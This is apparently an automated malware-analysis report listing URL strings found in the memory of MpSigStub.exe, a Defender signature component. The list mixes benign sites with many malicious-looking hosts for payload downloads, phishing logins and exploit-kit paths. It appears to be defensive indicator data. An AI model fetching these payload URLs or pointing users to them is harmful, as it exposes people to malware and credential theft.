Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: http://download.phpnuke.org/installers/extra_software/coupish/coupish-x
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://download.powercreator
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://download.seznam.cz/update
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://download.softobase.com/ru/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://download.softobase.com/ru/xL
Source: MpSigStub.exe, 00000024.00000003.6292407063.00000197A4EC4000.00000004.00000001.sdmp	String found in binary or memory: http://download.spy-shredder.com/ssdownload.php?&advid=00001322&u=%u&p=%u&lang=________&vs=%u&%s
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Dnl/T_
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/Tb
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://download.websearch.com/dnl/T
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/cdsearch/
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/msstat/dealip.asp?aa=%s&bb=%s&cc=%s&dd=%s&ee=%d&ff=%ld&gg=%
Source: MpSigStub.exe, 00000024.00000003.6312336240.00000197A3E16000.00000004.00000001.sdmp	String found in binary or memory: http://download.zhongsou.com/routeway/dealsetup.asp?aa=%s&bb=%s&cc=%s&dd=%s
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://download.zjsyawqj.cn/jjbq/setup_jjbq_jjbq03nodkpk_v1.0_silent.exe
Source: MpSigStub.exe, 00000024.00000003.6268699778.00000197A4FF7000.00000004.00000001.sdmp	String found in binary or memory: http://download1.ihyip.pw/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://download2.mybrowserbar.com/kits/hlp/exthelper.exe
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfile.xyz/mine/run.js
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/allfile.jpg
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index2.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index3.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index4.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://downloadfilesldr.com/index5.php?adv=141
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://downloads-full.com.br/
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: http://downloads.180solutions.com/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://downtown.crstycricri.net/pc/page/set_reg.php?af_code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6275208330.0000019790C4D000.00000004.00000001.sdmp	String found in binary or memory: http://downza.cn
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://dqbdesign.com/wp-admin/cu_sa/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://drm.ysbweb.com/v1.aspx?id=65181__asf_license_url_ends_here__
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: http://dropboxservices.isaihost.com/dropbox/drop/dropbox.html)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://drpuneetchawla.com/cli/adbe/login.html
Source: MpSigStub.exe, 00000024.00000003.6316460209.00000197A40AB000.00000004.00000001.sdmp	String found in binary or memory: http://dtrack.secdls.com
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://dudethisishowwedoitallnightlong.2myip.net
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://duhjhv.ftp1.biz/ip/stat.php
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://dvd2ipad.net/media2
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/
Source: MpSigStub.exe, 00000024.00000003.6284057981.00000197A47A0000.00000004.00000001.sdmp	String found in binary or memory: http://dw.mtsou.com/_
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://dwaplord2018.tk/doc/purchaseorder.doc
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: http://dx.mastacash.com
Source: MpSigStub.exe, 00000024.00000003.6304100006.00000197A2F93000.00000004.00000001.sdmp	String found in binary or memory: http://dxcodec.com/uninstall/
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: http://dz-site.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://e223pg.awardspace.co.uk/up.php
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://eastman.smritiphotography.in/#ywhvzgdlc0blyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://ebsuggester.com/redirect-new-logon-alert/redirect.htm
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://economycrown.com/hahdhdhd/sf-express.php?email=
Source: MpSigStub.exe, 00000024.00000003.6274276311.00000197A2E51000.00000004.00000001.sdmp	String found in binary or memory: http://eda.ru/data
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://eduardovolpi.com.br/flipbook/postal/services/parcel)
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://educadorfisicoadinis.com.br/ryan/login%20pdf.html)/type/action/s/uri
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://efficientlifechurch.com/.well-known/pki-validation/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://egomam.ru/neworder.doc
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://eleonorepack.cn/myexp/getexe.php?spl=javadmjava/io/bufferedoutputstreamjava/io/fileoutputstre
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://elpctchair00.net/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://elsword.com/xb
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://employeeportal.net-login.com/
Source: MpSigStub.exe, 00000024.00000003.6343232049.00000197A3FA3000.00000004.00000001.sdmp	String found in binary or memory: http://en.aa.com
Source: MpSigStub.exe, 00000024.00000003.6307634469.00000197A2ED4000.00000004.00000001.sdmp	String found in binary or memory: http://en.eazel.com/
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: http://en.v9.com/?utm_source=b&utm_medium=
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: http://endresactuarial.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://engine.dmccint.com/common/ProcessDump.exe?v=1.0.3.0x
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://enomioms.club/msw/
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://erasoltours.com/logs/hixfibqw.php
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://erlivia.ltd
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: http://ermi.co.zw/ds/2312.gif
Source: MpSigStub.exe, 00000024.00000003.6327908307.00000197A40EC000.00000004.00000001.sdmp	String found in binary or memory: http://errors.crossrider.com/utility.gif
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapper
Source: MpSigStub.exe, 00000024.00000003.6288538370.00000197A46DA000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.com/installer-error.gif?action=wrapperxk
Source: MpSigStub.exe, 00000024.00000003.6329696621.00000197A4DE7000.00000004.00000001.sdmp	String found in binary or memory: http://errors.statsmyapp.comxa
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://escritorioharpia.com/wp-content/upgrade/resume.php?id=
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: http://esiglass.it/glassclass/glass.php
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://esmxc01.top/download.php?file=lv.exe
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://esp1k.myddns.me/
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://estelaraziel.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6320871262.00000197A4180000.00000004.00000001.sdmp	String found in binary or memory: http://etzhb.000webhostapp.com/read.txt
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://eula.mindspark.com
Source: MpSigStub.exe, 00000024.00000003.6300197684.00000197A42BB000.00000004.00000001.sdmp	String found in binary or memory: http://eula.mindspark.com/eula/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: http://events.bittorrent.com/startConversion
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://everbot.pl/cs/reg.php?id=
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://ewd96h2.sed.macabrepoe.com
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://excelvba.ru/updates/download.php?addin=Parser
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://exe-1.icu/install2.exe
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://expandingdelegation.top/
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://experimental.sitesled.com/wind.jpg
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: http://explorehere.in/info/new-invoice-
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://f0568929.xsph.ru/po/rexifly.php?
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: http://f0570495.xsph.ru/files/pdf.php
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://f1visa.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: http://faacebookv.tk/reveal.php
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: http://facebegen.com/dexport/ajax.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: http://faisdodo.info/sbuild1.exe
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://faneuil-lawsuit.com/xl.png
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://fantastico.globo.com/jornalismo/fant/
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://fast-loads2.name/agreement.php
Source: MpSigStub.exe, 00000024.00000003.6313066347.00000197A4615000.00000004.00000001.sdmp	String found in binary or memory: http://fast-loads2.name/agreement.phpxN
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/abc.zip
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://fateh.aba.ae/xyzx.zip
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://fbcores.info/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://fechiizonshiteita-taihendayo.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: http://feed.helperbar.com
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: http://fei-coder.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://feliz2008.land.ru/iexplore.exe
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://fellatioadultfilehost.com/pc/page/set_reg.php?af_num=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://fellatiomovefilehost.net/movie.php?id=movies_n01.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://fen0men.info/exp/index.php
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://festival23234.com/flash.php?mode=1
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://fgrss.com/?referrer=c3rob3jhdeblyxn0bwfulmnvbq==
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://fhayazilim.com/wp-admin/
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: http://fibrassolpiscinas.com.br/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6345553259.00000197A36F1000.00000004.00000001.sdmp	String found in binary or memory: http://file.sidetab.co.kr/dst/WallTab_
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: http://files.getpricefinder.com/install/ie/pricefinderpackage.zip
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: http://finance.yahoo.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://finanzen-netto.de
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://find.verycd.com/folders?cat=movie&kw=%s
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://finder.strangled.net/?pubid=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://fineartconsult.be/gallery/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://firefoxstabs.com/
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://firestweb.com/loja/social/1.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://firestweb.com/loja/social/2.jpg
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: http://firestweb.com/loja/social/3.jpg
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://fixdoctorsfirst.net/registry/andyfkz.png?bg=sp14
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: http://flash.chinaren.com/ip/ip.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://flashupd.com/mp3/in
Source: MpSigStub.exe, 00000024.00000003.6283505070.00000197A475E000.00000004.00000001.sdmp	String found in binary or memory: http://flow4.6299.cc/ClientAPI/flowtaskAPI.aspx
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	String found in binary or memory: http://fmforums.com/wggx991264/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/SoftInterFace/SearchNum.aspx
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://foo.w97.cn/data/file/kwbuf.ini
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: http://forms.newlifeadmin.org
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://fortisdesigns.com/5ox6oyzzslcp
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: http://foundation.shanto-mariamfoundation.org/24.gif
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://foxxpriv.ru/pic1/index.php
Source: MpSigStub.exe, 00000024.00000003.6273173989.00000197A4452000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=10
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: http://frame.crazywinnings.com/scripts/protect.php?promo
Source: MpSigStub.exe, 00000024.00000003.6355237590.00000197A3E9A000.00000004.00000001.sdmp	String found in binary or memory: http://freeimagehost.ru/ubanner.png
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: http://freeunweb.pro/FreeUnWeb.exe
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: http://freevideoz.info/
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://freight.eu.com/download
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://fu.o3sb.com:9999/img.jpg
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://funsiteshere.com/redir.php
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://futebolclubesantacruz.com.br/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: http://futureweighed.ae.am/showthread.php?t=731756
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: http://g.delyemo.ru
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://g1.globo.com/Noticias/SaoPaulo/0
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://gahtt9j6.u8f3e5jq.ru
Source: MpSigStub.exe, 00000024.00000003.6351148277.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: http://gaigoixxx.blogspot.com/
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: http://galinasergeeva.ru
Source: MpSigStub.exe, 00000024.00000003.6344346071.00000197A30DC000.00000004.00000001.sdmp	String found in binary or memory: http://galleries.payserve.com/1/31952/1
Source: MpSigStub.exe, 00000024.00000003.6327011523.00000197A3767000.00000004.00000001.sdmp	String found in binary or memory: http://gallerydating.net
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://gallolitaadultmove.com/pc/page/set_reg.php?code=&cuid=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://gameroominc.com/
Source: MpSigStub.exe, 00000024.00000003.6279581351.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://games.enet.com.cn/article/SearchCategory.php?key=%s
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://garlic10.grey.ero0101.com/set_inf.php?id=ero257.wmv&cid=
Source: MpSigStub.exe, 00000024.00000003.6321480698.00000197A3B3E000.00000004.00000001.sdmp	String found in binary or memory: http://gathome.com/cgi-bin/first.pl
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://gdcbmuveqjsli57x.onion/b93cf40ee63ed066
Source: MpSigStub.exe, 00000024.00000003.6311649432.00000197A38AA000.00000004.00000001.sdmp	String found in binary or memory: http://ge.tt/api/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://geezybeatz.com/secured/index.html)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: http://geocities.com/jobreee/main.htm
Source: MpSigStub.exe, 00000024.00000003.6332642975.00000197A3551000.00000004.00000001.sdmp	String found in binary or memory: http://get.file136desktop.info/DownloadManager/Get?p=638x
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: http://getfreez.net/multi-codec-pack.php
Source: MpSigStub.exe, 00000024.00000003.6286203133.00000197A3ABB000.00000004.00000001.sdmp	String found in binary or memory: http://getmethere.ws
Source: MpSigStub.exe, 00000024.00000003.6439967654.00000197A4446000.00000004.00000001.sdmp	String found in binary or memory: http://getp.jujutang.com
Source: MpSigStub.exe, 00000024.00000003.6437789522.00000197A392D000.00000004.00000001.sdmp	String found in binary or memory: http://getsuperstuff.com
Source: MpSigStub.exe, 00000024.00000003.6285606128.00000197A309B000.00000004.00000001.sdmp	String found in binary or memory: http://getsyncer5.info/sync/?ext=bcool&pid=26&country=us
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: http://getvolkerdns.co.cc/priv8
Source: MpSigStub.exe, 00000024.00000003.6331200392.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: http://getwebcake.com/Privacy
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.co
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.coa
Source: MpSigStub.exe, 00000024.00000003.6320453518.00000197A412F000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: http://getyouneed.com/r.php?wm=5
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://gg.pw
Source: MpSigStub.exe, 00000024.00000003.6290223213.00000197A39E2000.00000004.00000001.sdmp	String found in binary or memory: http://ghsinternationalconferencewithinternationalfilesecureserviceglo.ydns.eu
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://ghthf.cf/cert/
Source: MpSigStub.exe, 00000024.00000003.6287974454.00000197A4D37000.00000004.00000001.sdmp	String found in binary or memory: http://gicia.info/cd/cd.php?id=%s&ver=g
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: http://gidstaxi.nl/mrszheuhe/8888888.png
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://ginger90.ivory.ero0101.com/set_inf.php?id=ero257.wmv&sid=
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: http://girlongirllibido.info/show.php?s=c366aa9358
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: http://gistsdey.com/wp-content/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: http://globalsoftbd.com/votre_agence-lcl.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: http://globonoticia.iitalia.com/noticia.com
Source: MpSigStub.exe, 00000024.00000003.6325389459.00000197A496F000.00000004.00000001.sdmp	String found in binary or memory: http://go.58.com/?f=
Source: MpSigStub.exe, 00000024.00000003.6347934302.00000197A4E28000.00000004.00000001.sdmp	String found in binary or memory: http://go.jetswap.com/ssflang.php?it=4893473
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: http://go.secureclick6.com/0534
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp	String found in binary or memory: http://go.winantivirus.com
Source: MpSigStub.exe, 00000024.00000003.6275006647.0000019790C75000.00000004.00000001.sdmp	String found in binary or memory: http://go.winantivirus.comx
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: http://goatse.ragingfist.net/
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: http://gogglgdoc.com/document/review/index.html)
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: http://gogo.ru/go?x;
